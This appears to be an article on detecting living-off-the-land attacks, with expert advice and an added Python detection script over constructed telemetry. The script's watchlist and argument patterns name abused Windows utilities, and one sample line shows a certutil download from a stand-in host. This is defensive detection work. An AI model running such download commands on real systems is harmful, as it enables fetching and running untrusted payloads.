Revamping the Network to Combat Living-Off-the-Land Tactics

Securing The Network Against Living Off the Land Attacks

As adversaries increasingly turn to legitimate tools and tactics to carry out their malicious activities, enterprises must adapt and enhance their network security measures to effectively detect and defend against these attacks. Known as “living off the land” (LotL), these tactics involve hackers using native, legitimate tools within an organization’s environment to avoid detection and carry out their attacks. By utilizing existing tools rather than introducing new ones, attackers make it difficult for defenders to differentiate between malicious actions and legitimate activity, thus evading detection.

To combat this threat, IT security leaders must rethink their network architecture to make it harder for attackers to move within the network. Implementing strong access controls, applying behavior analytics to privileged accounts, and adopting a zero-trust framework with strict privileged access controls can hinder attackers’ ability to navigate the network undetected. By forcing attackers to create more noise on the network, defenders have a better chance of spotting unauthorized access and suspicious activity early in the attack process, before malicious software or ransomware can be deployed.

In addition to access controls, organizations can consider implementing cloud access security broker (CASB) and secure access service edge (SASE) technologies to gain visibility into network connections and activities. CASB solutions act as intermediaries between end users and cloud service providers, offering security controls like data loss prevention, access control, encryption, and threat detection. SASE combines network security functions with wide area network capabilities, providing comprehensive security coverage for organizations adopting cloud services and applications.

Gareth Lindahl-Wise, CISO at Ontinue, emphasizes the importance of managing the attack surface created by living off the land techniques. Because these tactics reveal themselves through behavioral anomalies rather than novel binaries, it is crucial for security teams to monitor and analyze network traffic, access requests, and endpoint activities. By enriching telemetry data with network connectivity information and leveraging network traffic inspection, teams can uncover malicious activities and potential security threats, even in encrypted traffic.

Taking an evidence-based approach, organizations can prioritize telemetry sources that provide visibility into legitimate utility abuse. By focusing on telemetry sources that align with common LotL techniques observed in the wild, security teams can optimize their monitoring efforts and enhance their ability to detect and respond to threats. Scott Small, director of threat intelligence at Tidal Cyber, highlights community efforts like the LOLBAS project, which tracks potentially malicious applications of key utilities, as valuable resources for organizations seeking to bolster their security posture.

Randy Pargman, director of threat detection at Proofpoint, emphasizes the importance of leveraging endpoint events and custom detection queries to detect living off the land attacks. By monitoring endpoint events and identifying abnormal patterns of use, security teams can uncover suspicious activities and potential security breaches. Pargman also recommends limiting the abuse of built-in tools favored by attackers and strengthening authentication mechanisms for service accounts to mitigate the risk of LotL attacks.

Rob Hughes, CIO of RSA, underscores the need to reduce reliance on credentials and establish robust identity controls to prevent living off the land attacks. By investing in strong authentication mechanisms, monitoring interactive logins from service accounts, and maintaining an inventory of service accounts, organizations can enhance their security posture and mitigate the risk of unauthorized access and data breaches.
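As an added illustration of the custom detection queries Pargman describes and the service-account logon monitoring Hughes recommends (example code written for this article, not from any of the vendors quoted), the following pass runs three rules over constructed endpoint telemetry: suspicious command-line arguments for a LOLBAS-style utility, a per-host frequency baseline for the same utility, and interactive logons by service accounts. The record format, the watchlist, the argument patterns, the `svc_` naming rule and the burst threshold are all assumptions.

```python
import re
from collections import Counter

# Built-in utilities commonly tracked by LOLBAS-style lists (illustrative subset, not exhaustive).
LOLBIN_WATCHLIST = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe"}
# Command-line fragments that make an otherwise legitimate utility worth a closer look (assumed).
SUSPICIOUS_ARGS = re.compile(r"-urlcache|https?://|/i:|javascript:|-encodedcommand", re.I)
# Windows logon types treated as interactive here: 2 (console) and 10 (RemoteInteractive).
INTERACTIVE_LOGON_TYPES = {"2", "10"}
SERVICE_ACCOUNT_PREFIX = "svc_"   # assumed naming convention for service accounts
BURST_THRESHOLD = 3               # assumed per-host frequency baseline for the window

def parse_event(line):
    """Parse one constructed 'key=value|key=value' telemetry line into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))

def detect(lines):
    """Return (rule, detail) findings for constructed endpoint and logon telemetry."""
    findings, per_host = [], Counter()
    for line in lines:
        ev = parse_event(line)
        if ev["type"] == "process":
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            if image not in LOLBIN_WATCHLIST:
                continue
            per_host[(ev["host"], image)] += 1
            if SUSPICIOUS_ARGS.search(ev["cmd"]):
                findings.append(("lolbin_suspicious_args", f"{ev['host']} {image}: {ev['cmd']}"))
        elif ev["type"] == "logon":
            if ev["user"].lower().startswith(SERVICE_ACCOUNT_PREFIX) and ev["logon_type"] in INTERACTIVE_LOGON_TYPES:
                findings.append(("service_account_interactive_logon", f"{ev['host']} {ev['user']} type {ev['logon_type']}"))
    # Abnormal pattern of use: the same LOLBin spawned repeatedly on one host within the window.
    for (host, image), n in per_host.items():
        if n >= BURST_THRESHOLD:
            findings.append(("lolbin_burst", f"{host} {image} x{n}"))
    return findings

# Constructed sample telemetry (not real logs): process creations and logons from three hosts.
SAMPLE_TELEMETRY = [
    "type=process|host=ws01|image=C:\\Windows\\System32\\certutil.exe|cmd=certutil -urlcache -f http://example.invalid/a.txt a.txt",
    "type=process|host=ws01|image=C:\\Windows\\System32\\certutil.exe|cmd=certutil -hashfile setup.msi SHA256",
    "type=process|host=ws02|image=C:\\Windows\\System32\\rundll32.exe|cmd=rundll32 shell32.dll,Control_RunDLL",
    "type=process|host=ws02|image=C:\\Windows\\System32\\rundll32.exe|cmd=rundll32 printui.dll,PrintUIEntry",
    "type=process|host=ws02|image=C:\\Windows\\System32\\rundll32.exe|cmd=rundll32 url.dll,FileProtocolHandler",
    "type=logon|host=srv01|user=svc_backup|logon_type=10",
    "type=logon|host=srv01|user=svc_backup|logon_type=5",
    "type=logon|host=ws01|user=alice|logon_type=2",
]
```

Calling `detect(SAMPLE_TELEMETRY)` yields three findings: the download-style certutil arguments on ws01, the interactive logon by svc_backup on srv01, and the rundll32 burst on ws02, while the benign hash check and the service logon (type 5) produce nothing.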

Building a culture of security requires a time investment and commitment from organizational leadership. While enhancing identity controls and network security measures may require initial effort and resources, the long-term benefits of reducing security risks and protecting sensitive data outweigh the costs. By prioritizing security initiatives and investing in technical debt reduction, organizations can strengthen their defenses against evolving cyber threats and safeguard their digital assets.
